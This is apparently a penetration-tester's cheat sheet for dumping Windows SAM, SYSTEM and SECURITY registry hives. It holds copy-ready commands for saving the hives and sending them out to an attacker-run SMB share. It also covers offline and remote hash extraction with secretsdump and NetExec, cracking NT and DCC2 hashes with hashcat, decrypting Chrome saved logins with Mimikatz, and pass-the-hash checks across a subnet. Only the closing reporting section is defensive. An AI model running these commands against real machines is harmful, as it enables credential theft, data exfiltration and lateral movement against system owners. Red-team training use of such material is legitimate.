π‘οΈ Methodology Checklist
- Requires SYSTEM/Administrator privileges
- Reg save hives:
reg save HKLM\SAM sam.hive; reg save HKLM\SYSTEM system.hive - Impacket secretsdump local:
impacket-secretsdump -sam sam.hive -system system.hive LOCAL - NXC SAM:
nxc smb [TARGET] -u [USER] -p [PASS] --sam - Mimikatz:
lsadump::sam - Crack NTLM hashes:
hashcat -m 1000 hashes.txt [wordlist] - Test hashes for local admin reuse across network
π― Operational Context
Use when: Local admin access on non-DC Windows machine β dump SAM database for local account NTLM hashes.
Think Dumber First: nxc smb [TARGET] -u [ADMIN] -p [PASS] --sam dumps SAM remotely. Local: reg save HKLM\SAM sam.save && reg save HKLM\SYSTEM system.save then impacket-secretsdump -sam sam.save -system system.save LOCAL.
Skip when: Target is domain-joined with no local admin reuse β local SAM hashes may only apply to that one machine unless LAPS not deployed.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
reg.exe save hklm\sam C:\sam.save | Save SAM hive (run from admin prompt on target) |
reg.exe save hklm\system C:\system.save | Save SYSTEM hive (contains BootKey to decrypt SAM) |
reg.exe save hklm\security C:\security.save | Save SECURITY hive (LSA secrets, DCC2 cached creds) |
sudo python3 smbserver.py -smb2support CompData /tmp/loot | Start SMB listener to receive exfiltrated files |
move sam.save \\[LHOST]\CompData | Exfiltrate SAM hive to attacker via SMB |
move system.save \\[LHOST]\CompData | Exfiltrate SYSTEM hive |
move security.save \\[LHOST]\CompData | Exfiltrate SECURITY hive |
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | Extract hashes offline from saved hives |
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam | Remote SAM dump via NetExec |
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa | Remote LSA secrets dump via NetExec |
hashcat -m 1000 hashes.txt rockyou.txt | Crack NT hashes (local accounts) |
hashcat -m 2100 dcc2_hashes.txt rockyou.txt | Crack DCC2 cached domain credential hashes |
π¬ Deep Dive & Workflow
Three Hives, Three Purposes
| Hive | Registry Path | Contains |
|---|---|---|
| SAM | HKLM\SAM | Local account LM/NT password hashes |
| SYSTEM | HKLM\SYSTEM | BootKey β required to decrypt SAM |
| SECURITY | HKLM\SECURITY | LSA secrets, DCC2 cached domain creds, DPAPI keys |
You cannot decrypt SAM without SYSTEM. Always save all three.
Manual Exfiltration Workflow
Target (admin shell):
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
Attacker:
sudo python3 smbserver.py -smb2support CompData /tmp/loot
Target:
move sam.save \\[LHOST]\CompData
move system.save \\[LHOST]\CompData
move security.save \\[LHOST]\CompData
Attacker:
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
The -smb2support flag is required β SMBv1 is disabled by default on modern Windows.
Secretsdump Output Types
After running secretsdump, expect three output categories:
- NT Hashes β
Administrator:500:aad...:::format; crack with mode1000 - LSA Secrets β machine account keys, service account passwords,
_SC_service credentials - DCC2 β
$DCC2$10240#username#hash; cached domain creds for offline domain login; crack with mode2100(very slow β ~800x slower than NTLM due to PBKDF2)
Remote Dumping (No File Transfer)
If you have valid admin credentials and donβt want to touch disk on the target:
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsaDPAPI
The SECURITY hive also yields DPAPI master keys. These decrypt per-user secrets stored by Chrome, Outlook, and RDP credential files. Requires Mimikatz:
mimikatz # dpapi::chrome /in:"C:\Users\[USER]\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| reg save fails | Not admin or UAC blocking | Run from elevated prompt: Right-click β Run as Administrator; or bypass UAC first |
| impacket-secretsdump returns invalid format | Wrong file pair | Must have matching SAM + SYSTEM from same machine; SECURITY hive optional for LSA secrets |
| Local admin hash not valid on other machines | LAPS deployed or unique passwords | Confirm: nxc smb [SUBNET]/24 -u Administrator -H [HASH] --local-auth β LAPS = different hash per machine |
| SAM hash shows NULL | Account has no password | Account with no password still works: nxc smb [TARGET] -u Administrator -p '' |
| Cannot export SAM while OS running | VSS required | Use Volume Shadow Copy: vssadmin create shadow /for=C: then copy from shadow volume path |
π Reporting Trigger
Finding Title: SAM Database Dumped β Local Account Hashes Compromised Impact: SAM database dump provides NTLM hashes for all local accounts. If the local Administrator hash is shared across multiple machines (no LAPS), a single hash enables lateral movement to all matching systems via Pass-the-Hash. Root Cause: Local Administrator password reuse across multiple systems without LAPS. SAM database accessible after achieving local admin rights without triggering security alerts. Recommendation: Deploy LAPS (Local Administrator Password Solution) to randomize and rotate local admin passwords. Alert on reg.exe or vssadmin.exe invocation by non-admin processes. Implement Credential Guard to protect SAM hashes in memory.